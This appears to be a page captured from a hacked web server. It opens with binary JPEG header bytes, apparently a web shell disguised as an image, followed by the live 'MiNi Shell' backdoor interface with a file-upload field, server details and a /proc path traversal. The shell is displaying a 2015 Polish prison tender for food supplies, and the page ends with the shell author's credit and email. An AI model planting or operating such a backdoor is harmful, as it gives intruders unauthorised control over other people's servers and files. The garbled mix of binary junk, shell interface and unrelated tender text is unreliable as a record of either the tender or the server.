JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151123/316086-N-2015.html

<p class="kh_header"><b>Katowice: Sukcesywne dostawy różnych artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 316086 - 2015; data zamieszczenia: 23.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy w Katowicach , ul. Mikołowska 10a, 40-067 Katowice, woj. śląskie, tel. 32 2084567, faks 32 2512931.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Więziennictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy różnych artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy różnych artykułów spożywczych do Aresztu Śledczego w Katowicach:
1.Część 1 Artykuły nabiałowe i tłuszcze jadalne.
2.Część 2 Różne artykuły spożywcze.
3.Część 3 Konserwy mięsne, pasztety drobiowe.
4.Część 4 Konserwy rybne.
5.Część 5 Ryby mrożone, przetwory rybne.
6.Część 6 Warzywa przetworzone - kiszonki.
7.Część 7 Jaja spożywcze. 
Część 1 Artykuły nabiałowe i tłuszcze jadalne:
L.p	Artykuł	Szacunkowa ilość	Kod CPV
1	Mleko w proszku granulowane odtłuszczone (opakowanie 5 - 25 kg)	750 kg	15511700-0
2 	Serek topiony (opakowanie jednostkowe 0,1 kg)	1250 kg	15542200-1
3	Serek homogenizowany naturalny (opakowanie 0,1 - 0,15 kg) termin przydatności do spożycia min. 10 dni od daty dostawy	1700 kg	15551000-5
4	Serek kanapkowy naturalny do smarowania (opakowanie 0,1 - 0,150 kg) termin przydatności do spożycia min. 10 dni od daty dostawy	420 kg	15551000-5
5	Ser twarogowy chudy (opakowanie 0,2 - 0,25 kg) termin przydatności do spożycia min. 10 dni od daty dostawy	2700 kg	15542100-0
6	Serek typu fromage (opakowanie jednostkowe 0,1 kg) termin przydatności do spożycia min. 10 dni od daty dostawy	850 kg	15551000-5
7	Ser żółty twardy (opakowanie, blok do 5 kg)	750 kg	15544000-3
8	Serek ziarnisty (opakowanie 0,15 kg) termin przydatności do spożycia min. 10 dni od daty dostawy	350 kg	15545000-0
9	 Jogurt owocowy (opakowanie 0,12 - 0,2 kg) termin przydatności do spożycia min. 10 dni od daty dostawy	250 kg	15551320-4
10	Jogurt naturalny (opakowanie 0,12 - 0,2 kg ) termin przydatności do spożycia min. 10 dni od daty dostawy	200 kg	15551310-1
11	Śmietana 12% (opakowanie 0,2 - 1 litr) termin przydatności do spożycia min. 10 dni od daty dostawy	280 l	15512000-0
12	Margaryna roślinna do smarowania pieczywa (kostka 0,25 kg), zawartość tłuszczu minimum 40%	6850 kg	15431000-8
13	Olej roślinny jadalny (opakowanie jednostkowe od 1 - 5 litrów)	700 l	15411100-3
 - nie dopuszcza się produktów sero podobnych

Część 2  Różne artykuły spożywcze
L.p	Artykuł	Szacunkowa ilość	Kod CPV
1	Dżem owocowy, opak. jednostkowe 25g	160kg	15332290-2
2	Miód pszczeli naturalny - opak. jednostkowe 25g	100kg	15831600-8
3	Dżem owocowy, opakowanie - wiaderka do 15kg	1200kg	15332290-3
4 	Powidła śliwkowe, opakowanie - wiaderka do 15kg	1100kg	15332200-6
5	Marmolada wieloowocowa twarda, opakowanie - wiaderka do 15kg	1200kg	 15332290-3
6	Groszek konserwowy kl. I, opak. puszka od 0,4 do 5 kg	420kg	15331400-1
7	Papryka konserwowa w zalewie - opak. puszki lub słoje, waga netto po odcieku min. 45%wagi	400kg	 15331500-2
8	Koncentrat pomidorowy 30% , opak. puszka do 5 kg	1000kg	15331427-6
9	Mieszanka warzyw suszonych - minimum 5 składnikowa (m.in. seler, pietruszka, marchew, cebula, por), opak. do 10 kg	400kg	 03212000-0
10	Fasola biała Jaś, opak. do 50 kg	1500kg	15331131-4
11	Groch obłuskany, opak. do 50 kg	1500kg	15331132-1
12	Krajanka sojowa, opak. do 20 kg	280kg	15331137-6
13	Kotlety sojowe (schabowe), opak do 20 kg	280kg	15331137-6
14	Granulat sojowy, opak. do 20 kg 	70kg	15331137-6
15	Herbata granulowana, opakowania do 25 kg	170kg	 15863000-5
16	Kawa zbożowa, opakowania do 25 kg	200kg	 15860000-4
17	Musztarda, opak. jednostkowe 1 kg	200kg 	15871250-1
18	Majonez	30kg	15871273-8
19	Pieprz czarny mielony	70kg	15872100-2
20	Majeranek	15kg	15870000-7
21	Liść laurowy	15kg	15870000-7
22	Ziele angielskie ziarno	15kg	15870000-7
23	Papryka słodka mielona	30kg	15870000-7
24	Czosnek mielony	45kg	15870000-7
25	Koperek suszony	15kg	15870000-7
26 	Przyprawa uniwersalna w proszku typu jarzynka lub równoważna	85kg	15870000-7
27	Sól jodowana paczkowana po 1kg	1300kg	15872400-5
28	Przyprawa w płynie typu magi w opakowaniach do 2l.	950l	15870000-7
29	Ocet spirytusowy 10 %, opak. jednostkowe 1l	160l	15871100-5
30	Przyprawa do mięs w proszku	40kg	15872200-3
31	Przyprawa do bigosu w proszku	10kg	15872200-3
32	Kminek przyprawa	5kg	15870000-7
33	Syrop wysoko słodzony	400l	15831500-7
34	Kwasek cytrynowy	5kg	15870000-7
35	Bulion drobiowy, opak. do 20 kg	750kg	15891500-5
36	Sos grzybowy w proszku, opak. do 20 kg	50kg	15871260-4
37	Sos pieczeniowy w proszku, opak. do 20 kg	60kg	15871260-4
38	Sos boloński w proszku, opak. do 20 kg	70kg	15871260-4
39	Sos myśliwski w proszku - opak. do 20 kg	40kg	15871260-4
40	Zupa w proszku - barszcz biały, opak. do 20 kg	200kg	15891400-4
41	Żurek śląski - zakwas w płynie do 1l	 710l	15891000-0
Część 3 Konserwy mięsne, pasztety drobiowe
L.p	Artykuł	Szacunkowa ilość	Kod CPV
1	Konserwa mięsna, opak. puszka z otwieraczem lub alupac, 
waga jednostkowa - do 330g	501,60kg	15131000-5
2	Konserwa wieprzowa typu mielonka lub przysmak, opak. alupac, 
waga jednostkowa do 130g	679,90kg	15131000-5
3	Pasztet drobiowy w opakowaniu alupac - o wadze jednostkowej do 130g	715kg	15131320-4
Część 4 Konserwy rybne
L.p	Artykuł	Szacunkowa ilość  	Kod CPV
1	Konserwa - sałatka rybna typu Neptun lub równoważna z samootwieraczem - waga jednostkowa do 330g 	462kg	 15241200-1
2	Konserwa - paprykarz szczeciński z samootwieraczem - waga jednostkowa do 330g	561kg	 15221000-3
3	Konserwa - szprot w sosie pomidorowym 
z samootwieraczem - waga jednostkowa do 330g	412,50kg	15234000-7
Część 5 Ryby mrożone, przetwory rybne
L.p	Artykuł	Szacunkowa ilość  	Kod CPV
1 	Płaty śledziowe a la matias w wiaderkach 	400kg 	15241200-1
2	Ryba mrożona - filet z mintaja mrożony - w technologii shatterpack (SHP) - opakowaniach kartonowych 	260kg	 15221000-3
3	Kotlet rybny mrożony - produkt garmażeryjny, panierowany, 
skład ryby min. 40%	600kg 	15240000-2
Część 6 Warzywa przetworzone - kiszonki
L.p	Artykuł	Szacunkowa ilość  	Kod CPV
1	Kapusta kiszona opak. beczki zamykane - pojemność do 80 kg.	6500kg	15331142-4
2	Ogórki kiszone opak. beczki zamykane - pojemność do 80 kg	4000kg	15331000-7
Część 7 Jaja spożywcze 
L.p	Artykuł	Szacunkowa ilość  	Kod CPV
1	Jaja konsumpcyjne - klasa świeżości - A, 
kategoria wagowa L	55000szt.	03142500-3

Informacje dodatkowe dotyczące przedmiotu zamówienia:   

Przedmiot zamówienia w/wym asortymentu winien spełniać wymagania wymienione w obowiązujących przepisach prawa dotyczącego produkcji i obrotu żywnością a w szczególności:
1) Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. 2015. poz. 35) wraz z rozporządzeniami wykonawczymi do tej ustawy.
Wykonawca zrealizuje dostawy przedmiotu zamówienia do siedziby zamawiającego własnym transportem, na własny koszt. Środek transportu musi spełniać obowiązujące wymogi sanitarne dla przewozu artykułów żywnościowych. Koszty rozładunku przedmiotu zamówienia w całym okresie obowiązywania umowy ponosi wykonawca.

Ilość przedmiotu zamówienia jest ilością maksymalną, jaką może zamówić Zamawiający i może ona ulec zmniejszeniu w zależności od potrzeb Zamawiającego, przy czym proporcjonalnemu zmniejszeniu ulega również cena całkowita wynikająca z przeprowadzonego postępowania przetargowego.
Zamawiający, w okresie obowiązywania niniejszej umowy, zobowiązuje się do odbioru od Wykonawcy dostaw asortymentu obejmujących 70% (siedemdziesiąt procent) ilości przedmiotu zamówienia wskazanego przez Zamawiającego. Zamawiający będzie żądał przy każdej dostawie wystawionego handlowego dokumentu identyfikacyjnego. 

Harmonogram dostaw:
Dla części 1  jeden raz w tygodniu.
Dla części 2  jeden raz w miesiącu.
Dla części 3  jeden raz w miesiącu.
Dla części 4  jeden raz w miesiącu.
Dla części 5  do trzech razy w miesiącu.
Dla części 6  do dwóch razy w miesiącu.
Dla części 7  do czterech razy w miesiącu.   

Dostawy artykułów spożywczych winny odbywać się w dni robocze w godz. 8:00 - 11:30. Zamawiający  zastrzega, iż wjazd do jednostki będzie odbywał się bez zbędnej zwłoki, jednakże czas wjazdu pojazdu Dostawcy może być ograniczony względami bezpieczeństwa jednostki penitencjarnej, co w konsekwencji może wydłużyć czas oczekiwania na wjazd na jej teren.

Zamawiający zobowiązuje jednocześnie wykonawcę do tego, aby jakość dostarczanych artykułów spożywczych, sposób ich pakowania, a także rodzaj używanych opakowań zbiorczych oraz w stosowanych normach i powszechnie obowiązujących przepisach prawa  powodowały obniżenie ponoszonych przez zamawiającego kosztów przechowywania, przygotowania i dystrybucji dostarczanych artykułów i wytwarzanych z nich potraw oraz kosztów wywozu i utylizacji powstałych odpadów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Za spełniających ten warunek zamawiający uzna wykonawców, którzy złożą oświadczenie o spełnianiu wymagań określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z późn. zm.), zwanej dalej ustawą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunku zostanie dokonana jak w punkcie III 3.1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunku zostanie dokonana jak w punkcie III 3.1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunku zostanie dokonana jak w punkcie III 3.1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena warunku zostanie dokonana jak w punkcie III 3.1</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień warunków umowy dotyczących terminu realizacji przedmiotu zamówienia jedynie w przypadkach niezależnych od wykonawcy, na skutek klęsk żywiołowych spowodowanych nieodwracalnymi działaniami przyrody lub na skutek działań osób trzecich. Udowodnienie ww. sytuacji leżeć będzie po stronie wykonawcy.
Brzmienie istotnych postanowień projektu umowy może ulec zmianie w dowolnym zakresie jedynie przed terminem składania ofert.

W uzasadnionych przypadkach dotyczących: wstrzymania, zaprzestania produkcji, wycofania z rynku lub zmiany marki, Zamawiający przewiduje możliwość zmiany umowy w zakresie oferowanego asortymentu z zastrzeżeniem, iż oferowany zamiennik musi odpowiadać parametrom, co najmniej takim (niegorszym) jak oferowany produkt z gwarancją zachowania oferowanej ceny.
Zamawiający dopuszcza możliwość dokonania zmian zawartej umowy jedynie w przypadku, gdy wynikać to będzie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy (m. in. zmiany wysokości podatku od towarów i usług)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy w Katowicach, 40-067 Katowice, ul. Mikołowska 10a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2015 godzina 09:30, miejsce: Areszt Śledczy w Katowicach, 40-067 Katowice, ul. Mikołowska 10a.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com